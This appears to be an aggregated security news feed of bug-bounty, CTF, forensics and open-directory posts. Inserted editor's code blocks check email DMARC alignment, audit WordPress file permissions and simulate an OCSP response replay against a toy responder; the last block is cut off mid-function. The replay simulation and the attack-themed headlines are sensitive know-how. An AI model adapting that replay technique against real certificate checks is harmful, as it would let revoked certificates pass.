    1. Underlying reason which causes subdomain takeover vulnerabilities Continue reading on Medium »
    Stored XSS at https://www.tiktok.com/
    Hi everyone, Continue reading on Medium »

    Neurology Books and Articles
    Part of a Neurofeedback website. Some books and articles are older. https://brainmaster.com/software/pubs/books/ https://brainmaster.com/software/pubs/brain/ submitted by /u/Waft0Afar
    LLOD 11-30-22 (47 ODs!) (Large List of Open Directories)
    submitted by /u/ilikemacsalot
    A mix of old and new music albums
    144.76.107.125/storage/music/ submitted by /u/__M_N__

    I created a tool that will scan files with over 100K YARA rules and give you performance metrics, such as Information Gain, for each matching signature
    submitted by /u/pracsec

    HTB OSINT Challenge — Money Flowz
    OSINT CHALLENGE : Frank Vitalik is a hustler, can you figure out where the money flows? Continue reading on Medium »
    MilOsintCTF Writeup
    A Military themed OSINT CTF Continue reading on The Sleuth Sheet »
    OSINT — Meta-search engines and search aggregators.
    Hopain Tools, Inteltechniques, IntelligenceX, Aware OSINT Tools are start pages for dozens of search engines… Continue reading on Medium »

    Access (HTB — Retired)
    This machine is a retired challenge, that is, you will need a VIP subscription to access it. Long story short, once you finally get the root… Continue reading on Medium »
    Athena OS Distro focused on Cybersecurity
    Dive into a new Pentesting Experience with Athena OS Continue reading on Medium »
    Creating Malicious word documents
    Hi readers, here we will be looking into creating malicious word documents with the intent of running system commands using macro… Continue reading on Medium »

    SiriusXM Connected Vehicle Vulnerability
    Article URL: https://twitter.com/samwcyo/status/1597792162485522432 Comments URL: https://news.ycombinator.com/item?id=33807106 Points: 1 # Comments: 0

    Campaign Account Balance and History Disclosed in API Response
    LinkedIn disclosed a bug submitted by sachin_kumar_: https://hackerone.com/reports/1587374 - Bounty: $500
    If the website does not impose additional defense against CSRF attacks, failing to use the 'Lax' or 'Strict' values could increase the risk of exposur
    Yelp disclosed a bug submitted by shubhangirathore836: https://hackerone.com/reports/1707680

    Multiversity by @wefuzz_io, a collection of amazing resources for Hackers and Developers to learn, develop, showcase and contribute to the future of Web3 Security
    submitted by /u/ant4g0nist
    New details on commercial spyware vendor Variston
    submitted by /u/YogiBerra88888
    Building Policy Gate for DevSecOps using Open Policy Agent
    submitted by /u/nicksthehacker_
    SGX.Fail - Overview of SGX Attacks
    submitted by /u/Gallus

    SecWiki News 2022-11-30 Review
    No news updates today. For more recent articles, visit SecWiki.

    My Latest XSS Finding, Explained To Beginners | Bug Bounty
    No content preview
    TryHackMe writeup: A cursory analysis of the Jigsaw ransomware
    Ransomware is a threat that sent the computing world into a frenzy. In this article, I will discuss analysing the Jigsaw strain of it. Continue reading on InfoSec Write-ups »
    Attacktive Directory
    No content preview
    Write-up: Source code disclosure via backup files @ PortSwigger Academy
    No content preview
    Unique Rate limit bypass worth 1800$
    No content preview

    RAID1
    I got an E01 image from the customer that they claim is utilizing RAID1. RAID1 is supposed to make a mirror copy, no splitting into arrays. Host OS is Server 2019. When they mounted one of the HDs for imaging, none of the partitions were assigned a volume. So they made a full disk image and sent it my way. When I get the E01, I am unable to mount it. I run the image through Axiom and it carves, not parses, only some artifacts. I look at the image in FTK and it's saying the file system is Solaris/Linux Swap. I look at the partition table in the MBR and confirm that what is recorded in the partition table is Solaris/Linux Swap. More interesting notes: the first partition starts at 63 as opposed to 2048. Is there a specific way we should be imaging this RAID1 HD? Customer has both HDs, but I figured we only needed to image 1 as the second is a mirror copy. Thoughts? Thank you in advance /r/computerforensics submitted by /u/DeadBirdRugby
    Commercial FTK
    Anyone here used the commercial version of FTK? Is it worth buying? I work in a big company and we are adding a digital forensics function to our team. Now we are looking for the best tools to start with, one of which is FTK toolkit (basic version). Also appreciate any tool suggestions and advice. submitted by /u/DynamicResolution
    Windows 10 Build 1909 Hash List
    Where can I find a list of hashes for a baseline Windows 10 Build 1909? I remember reading about one but I can't find it on Google. submitted by /u/DeadBirdRugby

    FreeBuf Morning Report | NATO holds annual "Cyber Coalition" exercise; China's underage internet users reach 191 million
    On November 28, NATO held its annual "Cyber Coalition" exercise, with multiple countries participating, aimed at improving NATO's cyber defense and "joint operations" capability in cyberspace.
    Driver vulnerability in five Acer laptop models could allow malware intrusion
    A high-severity vulnerability in the driver of certain Acer laptop devices can disable UEFI Secure Boot, allowing attackers to deploy malware during the boot process.
    Rising to the challenge! The metaverse may become a major avenue for cyberattacks in 2023
    With the increase in both mature and emerging consumer-facing malicious cyberattacks, enterprise security teams face many challenges in 2023.

    Build Secure Java Applications With Fuzz Testing
    Today, I want to show you a way how to increase the integrity and functionality of your Java applications with fuzz testing. Continue reading on Medium »
    Code Intelligence Unveils Simple Open-Source Tool to Test Java Applications for Unexpected…
    The CI Fuzz CLI Tool Enables Developers to Find and Fix Functional Bugs and Security Vulnerabilities by Dynamically Generating Millions of… Continue reading on Medium »
  • Open

    The Burp challenge
    We recently launched the Burp challenge, to give our customers a unique opportunity to demonstrate their skills with Burp Suite Professional. Not only that, but the challenges involved put your web vu
  • Open

COM Components from 0 to 1
Author: 0r@nge. This article is a reader submission; Seebug Paper looks forward to your contributions, and every accepted piece receives a gift! Submission mailbox: paper@seebug.org. Preface: this article records the author's process of learning COM from 0 to 1, from first meeting COM through weaponising COM and hunting for COM bugs. COM components are vast and deep and well worth studying from both the development and the security angle; this article is only an introductory post. Basics: the basic description of COM is taken from 头像哥's blog. On COM, personally I have no sys...
Notes on Developing eBPF Programs on Android (Part 3)
Author: Hcamael@Knownsec 404 Team. Date: 30 November 2022. Related reading: Notes on Developing eBPF Programs on Android (Part 1); Notes on Developing eBPF Programs on Android (Part 2). While researching uprobes I came across a very useful feature of the Linux kernel. I had originally intended to study how to write uprobe code, how to deploy it once written, and how it gets matched up with the corresponding program. But there is very little material, and almost all of it only covers using...
  • Open

    Masters Degree
I'm an IT guy and want to ask one thing: should I go for a master's degree to achieve a senior-level post in an IT company? submitted by /u/zakwan30 [link] [comments]

  • Open

    Big OD of some stunning pictures
Mostly hi-res photos or pictures of views from around the world. Some other misc pictures scattered throughout. Looks safe for work, but I didn't verify. https://www.alale.co/uploads/ submitted by /u/BustaKode [link] [comments]
    A stack of wordpress indexes. I went looking for Dorothy Stratten after watching the Chippendales series.
    https://hyperbole.es/wp-content/uploads/ https://www.foundagrave.com/wp-content/uploads/ https://biographymask.com/wp-content/uploads/ https://www.news-people.fr/images/ https://www.taille-age-celebrites.com/wp-content/uploads/-75 https://www.helloastrology.com/wp-content/uploads/?SA https://www.iamnotastalker.com/wp-content/uploads/ Not a cheery subject by any metric but some of it was... frankly a bit macabre. submitted by /u/ringofyre [link] [comments]
    Some hi-res (4k) photos from different events (mostly in Russia)
    3.62GB of hi-res photos (4k) from different events (mostly in Russia) http://195.93.180.8/ A nice portrait of Sergey Lavrov comes as a bonus submitted by /u/GloomyGenius [link] [comments]
  • Open

    Computer Forensic Tool
What are your top 3 computer forensic tools (free and paid)? submitted by /u/Big_Moma_Bear [link] [comments]
    Having trouble creating a 'Raw Image' of an android device using FTK Imager!! Help needed!
The issue is that FTK is not recognizing the Android device. Is this because I didn't root the Android device? I know rooting an Android device helps in acquiring a raw image file, but I'm trying to acquire an image without rooting the device. Is it possible, or do I definitely need to root my device? I am actually afraid of data loss, thus going for an acquisition without rooting the device. I need to do this for project work and can only depend on open-source tools and the software available at the university. Can anyone help me with this? submitted by /u/StabbingHeart [link] [comments]
    Notable finding or chasing my tail?
    Does anyone know the significance of the term "leeHolm16" in association with Powershell? I haven't found any relevant http connections associated with it (yet), but am wondering if I'm chasing my tail. It could be default, as it appears date stamped significantly older than the PC itself is. My Google searching has shown troubling results, but if this is a default entry, it's just coincidental. Appreciate any thoughts submitted by /u/ShakeyShooter [link] [comments]
    DF UK Jobs
Hey. For a new graduate with a degree in DF, would a digital forensic technician be the job to apply for within a police force in the UK? This role doesn't have a degree listed as essential. Or would I be applying for a digital forensic specialist role within a police force? They seem to mention needing a degree and a few years' experience. Just trying to understand where I fit in with no prior experience other than a degree. submitted by /u/sausagefries32 [link] [comments]
  • Open

    Need for speed: static analysis version
    submitted by /u/pabloest [link] [comments]
    Looting Microsoft Configuration Manager
    submitted by /u/1njected [link] [comments]
    Xiongmai IoT Exploitation
    submitted by /u/chicksdigthelongrun [link] [comments]
    Subdomain Enumeration with DNSSEC
    submitted by /u/doitsukara [link] [comments]
    The Art of Bypassing Kerberoast Detections with Orpheus
    submitted by /u/sanitybit [link] [comments]
  • Open

    Stored XSS Payload when sending videos
    TikTok disclosed a bug submitted by aidilarf_2000: https://hackerone.com/reports/1536046 - Bounty: $500
    Any organization's assets pending review can be downloaded
    HackerOne disclosed a bug submitted by jobert: https://hackerone.com/reports/1787644
    Stored XSS in Dovetale by application of creator
    Shopify disclosed a bug submitted by kun_19: https://hackerone.com/reports/1652046 - Bounty: $1600
I found some API keys in JS files, a huge leak of token addresses, and a huge number of JS files are not forbidden
    AMBER AI disclosed a bug submitted by orange_h: https://hackerone.com/reports/1787121
  • Open

    had my pc in dmz, is it infected?
I was self-hosting some stuff like Plex/Sonarr/Nginx Proxy Manager and some linuxserver.io containers and a Minecraft server. I moved my PC to the DMZ before I figured out how to open my ports, but now I'm having some weird issues with my internet (0.3 Mbps / 300 Mbps speedtest, unable to do anything online). My router has already been formatted remotely by the ISP, and the issue is on the whole network. Any ideas? submitted by /u/loseryoda [link] [comments]
    MS student asking about a government job offer
I finished a BS in electrical engineering and I am halfway through an MS. I have received an offer for an NSA engineering job. I have a few questions. The work description is great for an entry-level engineer. What is it in reality? Is there really so much hardware and software to learn as described on the webpage? After 2 so-so internships, it seems the government is offering me a huge feast. Am I expecting too much as a beginner? After about 4-5 years I want to join the private sector (as a systems engineer or test engineer). Is that a realistic goal? Do government engineers get overtime? The pay is low and I would like to spend an extra hour or two in the lab every day if possible. Thanks in advance. submitted by /u/littlewood20 [link] [comments]
    Do you need a degree to become a pen tester?
    Hi. I would like to become a pen tester, and I would like to know if I would need a degree to become one. submitted by /u/AlternativeNo5023 [link] [comments]
    Do you have to be extroverted to be a pen tester?
Hi. I'm curious whether I would have to be extroverted in order to be a pen tester. I'm introverted and quite painfully shy. How can I communicate my findings to my clients at a high technical level, and flip the switch from introvert to extrovert when speaking to them? Also, how can I be more extroverted and not be as anxious when speaking to people? I'm in college as well. submitted by /u/AlternativeNo5023 [link] [comments]
    Some questions about an email header
I've already used an email header analyzer and it doesn't answer the question I have. I work at BigCo.org. I have someone trying to spoof one of my users, Mandy@BigCo.org, and emailing our Accounts department at JADAMS@BigCo.org asking accounting to change their auto payments to a different employee bank account. This email did get caught in spam because it failed DMARC, but I want to better understand the header. See header below. Am I correct that someone is trying to use "csavant@mtek.net" (smtp.mailfrom=csavant@mtek.net) to send the email to us? Does that mean that the MTEK.NET email server was hacked? Is there a way to tell if MTEK.NET is running an Exchange server or if they are using a subscriber online serv…
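The part of the header the question turns on is the Authentication-Results line: SPF is evaluated against the envelope sender (smtp.mailfrom, here mtek.net) while the recipient only ever sees the header From (BigCo.org), and DMARC fails precisely because those two domains do not align. An SPF pass for mtek.net only says the sending IP is permitted to send for mtek.net; on its own it does not tell you whether that domain was compromised or simply belongs to the sender. The block below is an editor's example, not the poster's header or any analyzer's code: it pulls the results out of a constructed Authentication-Results header and performs the alignment check itself. The two sample messages, the IP addresses and the DKIM values are all constructed; the organisational-domain helper uses the last two labels, a simplification of the Public Suffix List rules real DMARC uses.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed sample in the shape of the situation described in the post.
# The IP, the Authentication-Results values and the subject are placeholders.
SPOOFED_SAMPLE = """\
Authentication-Results: spf=pass (sender IP is 203.0.113.7)
 smtp.mailfrom=csavant@mtek.net; dkim=none (message not signed)
 header.d=none; dmarc=fail action=quarantine header.from=BigCo.org;
From: Mandy <Mandy@BigCo.org>
To: JADAMS@BigCo.org
Subject: Updated direct deposit details

"""

# Second constructed sample where envelope, DKIM and header domains agree.
ALIGNED_SAMPLE = """\
Authentication-Results: spf=pass (sender IP is 203.0.113.9)
 smtp.mailfrom=mandy@bigco.org; dkim=pass header.d=bigco.org;
 dmarc=pass action=none header.from=BigCo.org;
From: Mandy <Mandy@BigCo.org>
To: JADAMS@BigCo.org
Subject: Lunch

"""

FIELDS = {
    "spf": r"\bspf=(\w+)",
    "mailfrom": r"smtp\.mailfrom=([^\s;]+)",
    "dkim": r"\bdkim=(\w+)",
    "dkim_domain": r"header\.d=([^\s;]+)",
    "dmarc": r"\bdmarc=(\w+)",
    "header_from": r"header\.from=([^\s;]+)",
}


def parse_auth_results(value):
    """Pull results and identifiers out of an Authentication-Results header value."""
    flat = " ".join(value.split())            # unfold continuation lines
    out = {}
    for name, pattern in FIELDS.items():
        m = re.search(pattern, flat, re.IGNORECASE)
        out[name] = m.group(1).lower() if m else None
    return out


def organizational_domain(name):
    """Collapse a host or address to its last two labels.

    Simplification: real DMARC alignment uses the Public Suffix List, so a
    domain like example.co.uk would be handled wrongly here.
    """
    labels = name.lower().rstrip(".").split("@")[-1].split(".")
    return ".".join(labels[-2:])


def analyze(raw_message):
    """Decide whether the visible From domain is backed by an aligned SPF or DKIM pass."""
    msg = message_from_string(raw_message)
    auth = parse_auth_results(msg.get("Authentication-Results", ""))
    header_from = parseaddr(msg.get("From", ""))[1].split("@")[-1].lower()
    envelope_from = (auth["mailfrom"] or "").split("@")[-1]
    # DMARC: the domain the reader sees (header From) must align with the
    # domain that actually passed SPF (envelope MAIL FROM) or DKIM (d= tag).
    spf_aligned = (auth["spf"] == "pass"
                   and organizational_domain(envelope_from) == organizational_domain(header_from))
    dkim_aligned = (auth["dkim"] == "pass" and auth["dkim_domain"] is not None
                    and organizational_domain(auth["dkim_domain"]) == organizational_domain(header_from))
    return {
        "header_from_domain": header_from,
        "envelope_from_domain": envelope_from,
        "spf": auth["spf"], "dkim": auth["dkim"], "dmarc": auth["dmarc"],
        "spf_aligned": spf_aligned,
        "dkim_aligned": dkim_aligned,
        "dmarc_pass": spf_aligned or dkim_aligned,
    }


if __name__ == "__main__":
    for label, sample in (("spoofed", SPOOFED_SAMPLE), ("aligned", ALIGNED_SAMPLE)):
        print(label, analyze(sample))
```

For a real message, feed the full raw source to analyze(); the Received chain and the sending IP's reverse DNS are what you would look at next to learn anything about mtek.net's mail setup, and that is not something the Authentication-Results header alone can tell you.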
    OpenCTI Requirements
Got OpenCTI up and running in a cyber range that was an OVA image with 4 cores and 16 GB RAM. Also have it running on my home lab with Docker between two Ubuntu boxes, each with 6 cores and 10 GB RAM. I'm trying to spec out what I would need, hardware/resource-wise, to implement it within my organization. It doesn't seem I am hitting any limits within either of my installations, but then again I'm only running about 5 connectors, and integrations with our EDR and firewall. Anyone running it in prod who can relay what you installed it on and what resources you provided? submitted by /u/Deathlord1973 [link] [comments]
    How is TCM security’s mobile app pentesting course?
Hi. I would like to get into pentesting and I would like to purchase The Cyber Mentor's mobile app pen testing course. It said to have an iPhone or iPad with iOS 14.7 or less. My iPhone's iOS updated to 16.1.1. Will that work for the course or not? If not, then why not? submitted by /u/AlternativeNo5023 [link] [comments]
    Secure E2E File Transfer Product Needed
Hi all, just curious about what tools or products you use to transfer sensitive files to your clients/customers. I am searching for a convenient but secure enough way to transfer pentesting reports and audit files after an assessment. We are currently using a tool named "FTAPI". It works great, but I am really interested in alternatives or your approach. I am aware of the following methods: Using encrypted zip files protected by a password. The password is communicated to the client via a second channel. Disadvantage is the need to communicate the decryption password via a second channel. Using one of the various E2E file transfer products that rely on the decryption key being placed inside the file's access link (URL) after #, so the decryption happens on the client side. Disadvantage is that anyone with knowledge of the link can just access the files; no additional user authentication is needed. If an additional password prompt is required, we again need to communicate the password via a second channel. Additional features like limiting how often the link can be accessed are often bricked by 3rd-party link scanners like Microsoft's Secure Link. General S/MIME/PGP mail encryption. Disadvantage is that many companies and clients don't have it. What's your approach? Thanks in advance! submitted by /u/sk1nT7 [link] [comments]
    SOC architecture - SIEM - SOAR - IR
Hello, do you have any experience integrating Splunk with Shuffle and TheHive? I've got no idea where to start and don't have the picture painted in my mind, so any architectural/networking information would be highly appreciated! Do you think it's a good combination? Any tips, recommendations or materials are welcome. Thanks! submitted by /u/tryingtoworkatm [link] [comments]
    Correct rule for Permissions and security for files?
There are 3 options for every file and folder in WP: read, write and execute for user, group and world. User is the admin, right? World means public? And group: I don't have any other people as admin or editor, only me running the site. By default, wp-login.php is set to group and world too. Does that mean people will be able to view the login page of my site? Shouldn't I uncheck world and group? [Imgur](https://imgur.com/KNcKhiU) By default, wp-admin.php is set to read and execute for group and world also. But why? Why does the world need to see and execute wp-admin.php? Shouldn't only the user have read, write and execute? [Imgur](https://imgur.com/x37WOCT) Similarly with wp-config.php, read is also there for group and world. This can be because Loginizer advised changing to 0444 and I did chmod 0444 for wp-config.php. [Imgur](https://imgur.com/h5PG2mb) Am I missing some logic here? submitted by /u/yoyobono [link] [comments]
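The distinction the questions above turn on is that the user/group/world bits govern which local Unix accounts can open a file, the web server process among them; browser visitors never read files directly, the web server reads wp-login.php on their behalf and hands it to the PHP interpreter. So the bits that matter are whether the web server's account can read what it must serve, whether other local accounts (other tenants on shared hosting) can read credentials such as wp-config.php, and whether anything is world-writable. The block below is an editor's example, not part of the post or of WordPress: it encodes that policy, based on the common WordPress hardening baseline of 755 for directories, 644 for files and 400/440 for wp-config.php, and walks an install to report deviations. The file names and modes used in the usage are assumed.

```python
import os
import stat

# Files whose contents are credentials; assumed baseline, extend as needed.
SENSITIVE = {"wp-config.php"}


def check_mode(name, mode, is_dir):
    """Return a list of findings for one path, given its permission bits (e.g. 0o644)."""
    findings = []
    if is_dir:
        if not mode & stat.S_IXUSR:
            findings.append("owner cannot traverse the directory (no x bit)")
    else:
        if mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH):
            # PHP sources are read by the web server and fed to the interpreter;
            # an execute bit buys nothing and only helps an attacker who manages
            # to drop or overwrite a file.
            findings.append("execute bit set on a file; PHP does not need it")
    if mode & stat.S_IWOTH:
        findings.append("world-writable: any local account can modify it")
    if name in SENSITIVE and mode & stat.S_IROTH:
        # Read bits for group/world decide which local accounts can open the file,
        # not which HTTP clients can fetch it. 0400 (owner only) or 0440 (owner
        # plus the web server's group) keeps the DB password off other tenants.
        findings.append("credentials file is world-readable; use 0400 or 0440")
    return findings


def audit_tree(root):
    """Walk an install and return {relative_path: findings} for paths with findings."""
    report = {}
    for dirpath, dirnames, filenames in os.walk(root):
        entries = [(d, True) for d in dirnames] + [(f, False) for f in filenames]
        for entry, is_dir in entries:
            full = os.path.join(dirpath, entry)
            mode = stat.S_IMODE(os.lstat(full).st_mode)   # permission bits only
            found = check_mode(entry, mode, is_dir)
            if found:
                report[os.path.relpath(full, root)] = found
    return report


if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for path, found in sorted(audit_tree(root).items()):
        print(f"{path}: {'; '.join(found)}")
```

Run it as the web server's own account (for example with sudo -u www-data) if you also want to confirm that account can still read what it serves; this script only reports on the bits, not on ownership.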
    ClamAV 1.0.0 LTS released | OpenSource AntiVirus | Cisco Talos
    ClamAV 1.0.0 LTS released - OpenSource AntiVirus - Cisco Talos https://blog.clamav.net/2022/11/clamav-100-lts-released.html submitted by /u/Neustradamus [link] [comments]
  • Open

    What are you using to collaborate on collection of OSINT data?
    Title. My team and I use OneNote purely for the collaboration features but boy is it a PITA to digest information after the fact. I’d love to use Obsidian but the LOE to get the team up to speed isn’t worth it in a pinch, not at the moment at least. submitted by /u/cyberbutler [link] [comments]
  • Open

Cyber Security Through Practice
The material I used in my webinar "Uygulamalarla Siber Güvenlik" (Cyber Security Through Practice), held on 29.11.2022 as part of Cyber Security Week… Continue reading on Siber »
Cyber Security Through Practice
The material I used in my webinar "Uygulamalarla Siber Güvenlik" (Cyber Security Through Practice), held on 29.11.2022 as part of Cyber Security Week… Continue reading on Bilişim Hareketi »
    I asked 10 Hackers Their Favourite Ways to Break into Organizations
    Hello all, I come bearing gifts once more. To all cybersecurity professionals (especially those at Management and C-level) — I asked my… Continue reading on System Weakness »
    Subdomain Enumeration with DNSSEC
    Enumerating DNS zones by using DNSSEC records like NSEC and NSEC3 Continue reading on SSE Blog »
  • Open

    P1 Bug Hunting — Remote and Local File Inclusion Vulnerabilities
    TL;DR- A full walkthrough and step-by-step process that lands you bug bounties within minutes on file inclusion vulnerabilities. Continue reading on The Gray Area »
    Who Will You Learn From at IWCON2022?
    Check out the star-studded speaker-line-up for the much-awaited cybersecurity conference. Continue reading on InfoSec Write-ups »
    Subdomain Enumeration with DNSSEC
    Enumerating DNS zones by using DNSSEC records like NSEC and NSEC3 Continue reading on SSE Blog »
    How To Install Autorize on Burpsuite
    Simple Steps to Install Autorize with Jython inside Burpsuite’s Bapp Store | November 2022 ~ Karthikeyan Nagaraj Continue reading on System Weakness »
    Full RCE via File Upload + Reverse shell OpenBugBounty
    The video is here: https://youtu.be/RIMb0I8DydU Continue reading on Medium »
    Unvalidated Redirects and Forwards
    Introduction Continue reading on InfoSec Write-ups »
    VoIP Spoofing (Intigriti) 1,250€
Hello folks, I just want to explain a misconfiguration that affects an asset on Intigriti. So, let's start!! Continue reading on Medium »
    Recon
    The Art of Gathering Information Continue reading on Medium »
    Unrestricted File Upload: A Common Bug With A High Potential Revenue On HackerOne! — StackZero
    An explanation of what is unrestricted file upload vulnerability and how to exploit it in a lab by using DVWA. Continue reading on InfoSec Write-ups »
  • Open

    SecWiki News 2022-11-29 Review
DSRE: a Data Security Risk Enumeration knowledge framework, by ourren; Analysis of Windows Defender's memory scanning feature, by asdjkl; A deep dive into WinRM tricks for red team operations, by asdjkl; On the root cause of CVE-2022-22965 (Part 6), by SecIN community. For more of the latest articles, visit SecWiki.
  • Open

    Who Will You Learn From at IWCON2022?
    No content preview
    Best Information Technology Schools in 2023
    No content preview
    How to Plug Common Supply Chain Vulnerabilities
    No content preview
    Unvalidated Redirects and Forwards
    Introduction Continue reading on InfoSec Write-ups »
    Unrestricted File Upload: A Common Bug With A High Potential Revenue On HackerOne! — StackZero
    No content preview
    Behind the SMS Bombing Application
    No content preview
  • Open

OSINT: Finding information about Polish citizens and companies.
Prod.ceidg.gov.pl: searching for legal entities in Poland's national register. Continue reading on Medium »
    Subdomain Enumeration with DNSSEC
    Enumerating DNS zones by using DNSSEC records like NSEC and NSEC3 Continue reading on SSE Blog »
    Ohsint
    Try Hack Me Continue reading on Medium »
  • Open

    Measuring the Impact of a Security Awareness Program
    Our goal in building a security awareness program is to embed security into our partners’ existing organizational culture. Impacting culture is a long-term process that can take years and requires executive support. If you are tasked with managing a security awareness program, it is your job to measure and show leadership that your program is... The post Measuring the Impact of a Security Awareness Program appeared first on TrustedSec.
  • Open

MSMAP: a powerful in-memory WebShell generator
MSMAP is a powerful in-memory WebShell generation tool that helps researchers generate, manage and use WebShells more effectively.
How to use EvilTree to search file contents for regex or keyword matches
EvilTree is a powerful file-content search tool that builds on the classic "tree" command.
FreeBuf Morning Report | Encryption provider for Sony and other flash-drive makers leaks data; Acer laptops have a driver vulnerability
ENC Security, the Dutch software company that supplies encryption solutions for USB devices from Sony, Lexar, SanDisk and others, was found to have exposed configuration and certificate files for over a year.
Russian RansomBoggs ransomware targets Ukrainian entities
Slovak cybersecurity firm ESET said the attacks against several Ukrainian entities were first observed on 21 November 2022.
Facebook fined 265 million euros for leaking the data of 533 million users
Ireland's Data Protection Commission has fined Facebook's parent company Meta 265 million euros (about 2 billion yuan) over the 2021 large-scale Facebook data leak.
DUCKTAIL malware targeting Facebook Business and Ads accounts is back
The spear-phishing group has changed its tactics and, based on extensive research into Facebook Business and Ads Manager accounts, adopted more sophisticated techniques and strategies.
  • Open

YApi <1.12.0 Remote Command Execution Vulnerability
Author: xxhzz@Xinglan Technology (星阑科技) PortalLab. Original link: https://mp.weixin.qq.com/s/UTMly3wLfK0SQHOj5CcN8w. Preface: the lab team has developed a command-line scanner for automated Web/API vulnerability fuzzing (tool: https://github.com/StarCrossPortal/scalpel). This week the focus is on continuously updating its vulnerability PoC library, and detection rules for vulnerabilities in several popular components have been added...
  • Open

    Post Compilation
    Investigating Windows Systems It's the time of year again when folks are looking for stocking stuffers for the DFIR nerd in their lives, and my recommendation is a copy of Investigating Windows Systems! The form factor for the book makes it a great stocking stuffer, and the content is well worth it! Yes, I know that book was published in 2018, but when I set out to write the book, I wanted to do something different from the recipe of most DFIR books to that point, including my own. I wanted to write something that addressed the analysis process, so the book is full of pivot and decision points, etc. So, while artifacts may change over time...some come and go, others become new and change in format over time, others suddenly appear...it's the analysis process that doesn't change. For exampl…

  • Open

    Beating Plagiarism Checkers with a Custom Font
    submitted by /u/Exact-Practice-8658 [link] [comments]
    subzuf – a smart DNS response-guided subdomain fuzzer
    submitted by /u/feecle [link] [comments]
    Exception(al) Failure - Breaking the STM32F1 Read-Out Protection
    submitted by /u/Gallus [link] [comments]
    ransomwhere: a ransomware sample to test out your ransomware response strategy.
    submitted by /u/nindustries [link] [comments]
    Heap_detective is an open-source static analysis tool that finds pitfalls in heap memory usage in C and C++.
    submitted by /u/CoolerVoid [link] [comments]
  • Open

    [BUG BOUNTY] SUBDOMAIN TAKEOVER IN TARGET CNAME NETLIFY
A subdomain takeover occurs when an attacker gains control over a subdomain of a target domain. Normally this happens… Continue reading on Medium »
    Improper error handling leads to exposing internal tokens
    Recently I started using a new application for secret management. Let the name be [redacted]. Continue reading on Medium »
    Broken access control + misconfiguration = Beautiful privilege escalation
    Hello His/Her Continue reading on Medium »
    The Benefits and Drawbacks of Bug Bounty Programs
    Severe defects that reach customers have a very real effect on the bottom line. Continue reading on Bug Zero »
    Bug Bounty Alert: Welcome Gton Capital
    Today we welcome Gton Capital to the Hats ecosystem! We are happy to help them take the right path towards decentralized security. Their… Continue reading on Medium »
    5 Different Techniques to Perform Account Takeover
    1. No Rate-Limit / Brute-Forcing Continue reading on Medium »
    Bug Bounty Programs: What Are They?
    Everything You Should Know Continue reading on Bug Zero »
    What is Bug Bounty & How to Get Started?
    A Definitive Guide to Bug Bounty Continue reading on Bug Zero »
  • Open

    NEED HELP WITH PORTFORWARDING
I wanted to host my Apache web server on the WAN using my virtual machine (Kali Linux). I have configured my virtual machine network adapter settings to NAT (Protocol: TCP) (HOST PORT=8080) (GUEST PORT=80) (HOST IP: 127.0.0.1) (GUEST IP: 10.0.2.15). I have also enabled IPv4 port forwarding on my router, but this is where I got confused. You see, when I selected my Kali Linux device it gave me a different IP, which is 192.168.18.26; however, when I typed the IP address command in my terminal it shows that my IP is 10.0.2.15. So I made 2 different profiles, one with the 192.168.18.26 IP and the other with the 10.0.2.15 IP (both have the same external IP address of 103.36.19.202 and both have the same external port number: 80 80 / internal port number: 80 80). I failed to establish a connection over the WAN. What should I do? submitted by /u/prod_kenn [link] [comments]
    What am I missing?
    So I'm already using password managers and 2FA with Yubikeys. I back up my data and use only encrypted drives, I try to manage app permissions on my laptop and my phone too, and turn off my camera and microphone when not in use. For browsing, I only use Brave and DDgo with all my networks using encrypted DNS. Now my question: is there anything else I can possibly do to make my internet life safer and limit my exposure to possible dangers? Anything helps, thank you guys in advance for your time, and stay safe. submitted by /u/xaintmex [link] [comments]
    Question about OCSP
I have an assignment in which I have to implement OCSP and do a proof of concept of a vulnerability. My idea was to implement OCSP without using a nonce (this is done) and then perform a replay attack. However, I'm having trouble doing the replay attack on localhost. Does anyone have another suggestion for a proof of concept of an attack I can do? I can't find much about this online. Thanks submitted by /u/Smart-Ad-3268 [link] [comments]
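The replay the post describes comes down to one property of an OCSP response: its signature covers thisUpdate, nextUpdate and, if the request carried one, the echoed nonce (RFC 6960), so an on-path attacker cannot alter a captured response but can hand it back unchanged. Without a nonce the only thing bounding the replay is the thisUpdate/nextUpdate window, which in practice is how most clients behave, because many public responders serve pre-signed responses and ignore nonces (the RFC 5019 profile). The block below is an editor's simulation, not the poster's implementation and not real OCSP encoding: an HMAC stands in for the responder's signature, JSON for DER, and the attacker's interposition is modelled by handing the captured response to the client in place of a fresh one. It shows a revoked certificate being accepted as "good" by a naive client, accepted by a freshness-only client inside the window, and rejected by a nonce-checking client or once the window has passed; the key, serial and timestamps are constructed.

```python
import hashlib
import hmac
import json
import os

# Stand-in for the responder's private key: an HMAC secret shared with the
# client only to keep the example self-contained. A real responder signs with
# an RSA/ECDSA key and the client verifies against the responder certificate.
RESPONDER_KEY = b"constructed-responder-key"
VALIDITY = 3600  # seconds between thisUpdate and nextUpdate


class Responder:
    """Minimal OCSP-like responder: answers status queries and echoes a nonce if sent."""

    def __init__(self, key):
        self.key = key
        self.revoked = set()

    def respond(self, request, now):
        body = {
            "serial": request["serial"],
            "status": "revoked" if request["serial"] in self.revoked else "good",
            "thisUpdate": now,
            "nextUpdate": now + VALIDITY,
        }
        if "nonce" in request:            # nonce extension, echoed back under the signature
            body["nonce"] = request["nonce"]
        return {"body": body, "sig": self._sign(body)}

    def _sign(self, body):
        raw = json.dumps(body, sort_keys=True).encode()
        return hmac.new(self.key, raw, hashlib.sha256).hexdigest()


def verify(response, key, now, expected_nonce=None, check_freshness=True):
    """Client-side checks. Returns the certificate status, or a rejection reason."""
    raw = json.dumps(response["body"], sort_keys=True).encode()
    if not hmac.compare_digest(hmac.new(key, raw, hashlib.sha256).hexdigest(), response["sig"]):
        return "bad-signature"
    body = response["body"]
    if expected_nonce is not None and body.get("nonce") != expected_nonce:
        return "nonce-mismatch"           # a replayed answer carries the old nonce (or none)
    if check_freshness and not body["thisUpdate"] <= now < body["nextUpdate"]:
        return "stale"                    # outside the responder's validity window
    return body["status"]


def replay_demo():
    """Capture a 'good' answer, revoke the cert, then replay the capture to several clients."""
    responder = Responder(RESPONDER_KEY)
    serial = 42
    t0 = 1_700_000_000
    captured = responder.respond({"serial": serial, "nonce": os.urandom(16).hex()}, now=t0)
    responder.revoked.add(serial)          # revocation happens after the capture
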